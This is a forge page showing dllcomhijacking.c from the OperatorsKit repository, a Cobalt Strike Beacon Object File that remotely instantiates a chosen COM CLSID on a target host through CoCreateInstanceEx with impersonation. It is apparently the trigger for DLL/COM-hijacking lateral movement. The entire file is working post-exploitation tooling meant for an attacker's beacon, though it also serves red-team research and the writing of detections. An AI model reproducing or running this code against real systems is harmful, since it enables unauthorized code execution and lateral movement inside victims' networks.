Home Explore Help
Sign In
zhensolid
/
OperatorsKit
1
0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Branch: main
Branches Tags
OperatorsKit
/
KIT
/
DllComHijacking
/
dllcomhijacking.c

dllcomhijacking.c 2.4 KB
Permalink History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778 
  1. #include <stdio.h>
    2. 

  2. #include <Windows.h>
    3. 

  3. #include <objbase.h>
    4. 

  4. #include <oleauto.h>
    5. 

  5. #include <wbemidl.h>
    6. 

  6. #include "dllcomhijacking.h"
    7. 

  7. #include "beacon.h"
    8. 

  8. 

  9. #pragma comment(lib, "ole32.lib")
    10. 

  10. #pragma comment(lib, "oleaut32.lib")
    11. 

  11. 

  12. 

  13. void InstantiateCOMObject(LPCOLESTR clsidString, WCHAR remoteHost[]) {
    14. 

  14.     IID iid;
    15. 

  15.     HRESULT hr = OLE32$CLSIDFromString(clsidString, &iid);
    16. 

  16. 	if (FAILED(hr)) {
    17. 

  17. 		if (hr == 0x800401f3) {
    18. 

  18. 			BeaconPrintf(CALLBACK_ERROR, "The provided CLSID format \"%S\" is not correct (error code: 0x800401f3).\n", clsidString);
    19. 

  19. 		} else {
    20. 

  20. 			BeaconPrintf(CALLBACK_ERROR, "CLSIDFromString failed with error code: 0x%08lx\n", hr);
    21. 

  21. 		}
    22. 

  22. 		return;
    23. 

  23. 	}
    24. 

  24. 

  25.     hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
    26. 

  26.     if (FAILED(hr)) {
    27. 

  27.         BeaconPrintf(CALLBACK_ERROR, "CoInitialize failed with error code: 0x%08lx\n", hr);
    28. 

  28.         return;
    29. 

  29.     }
    30. 

  30. 

  31.     COAUTHINFO authInfo = {0};
    32. 

  32.     authInfo.dwAuthnSvc = RPC_C_AUTHN_WINNT;
    33. 

  33.     authInfo.dwAuthzSvc = RPC_C_AUTHZ_NONE;
    34. 

  34.     authInfo.pwszServerPrincName = NULL;
    35. 

  35.     authInfo.dwAuthnLevel = RPC_C_AUTHN_LEVEL_DEFAULT;
    36. 

  36.     authInfo.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE;
    37. 

  37.     authInfo.pAuthIdentityData = NULL;
    38. 

  38.     authInfo.dwCapabilities = EOAC_NONE;
    39. 

  39. 

  40.     COSERVERINFO serverInfo = {0};
    41. 

  41.     serverInfo.pwszName = remoteHost;
    42. 

  42.     serverInfo.pAuthInfo = &authInfo;
    43. 

  43. 

  44. 	IID IIDIUnknown = {0x00000000, 0x0000, 0x0000, {0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}};
    45. 

  45.     MULTI_QI mqi = {0};
    46. 

  46.     mqi.pIID = &IIDIUnknown; 
    47. 

  47. 

  48.     hr = OLE32$CoCreateInstanceEx(&iid, NULL, CLSCTX_REMOTE_SERVER, &serverInfo, 1, &mqi);
    49. 

  49.     if (FAILED(hr)) {
    50. 

  50. 		if (hr == 0x80040154) {
    51. 

  51. 			BeaconPrintf(CALLBACK_ERROR, "Instantiating the COM object failed because it is not registered on the target system (error code: 0x80040154).\n", clsidString);
    52. 

  52. 		} else {
    53. 

  53. 			BeaconPrintf(CALLBACK_ERROR, "CoCreateInstanceEx failed with error code: 0x%08lx\n", hr);
    54. 

  54. 		} 
    55. 

  55.     } else {
    56. 

  56.         BeaconPrintf(CALLBACK_OUTPUT, "==========================================\n[+] COM object instantiated successfully!\n");
    57. 

  57.     }
    58. 

  58. 

  59. 	if (mqi.pItf) mqi.pItf->lpVtbl->Release(mqi.pItf);
    60. 

  60.     OLE32$CoUninitialize();
    61. 

  61. }
    62. 

  62. 

  63. 

  64. int go(char *args, int len) {
    65. 

  65. 	datap parser;
    66. 

  66.     LPCOLESTR* clsidString = L"";
    67. 

  67.     WCHAR* host = L""; 
    68. 

  68. 	
    69. 

  69. 	BeaconDataParse(&parser, args, len);
    70. 

  70. 	clsidString = BeaconDataExtract(&parser, NULL);
    71. 

  71. 	host = BeaconDataExtract(&parser, NULL);
    72. 

  72. 

  73.     InstantiateCOMObject(clsidString, host);
    74. 

  74.     return 0;
    75. 

  75. }
    76. 

  76. 

  77. 

  78.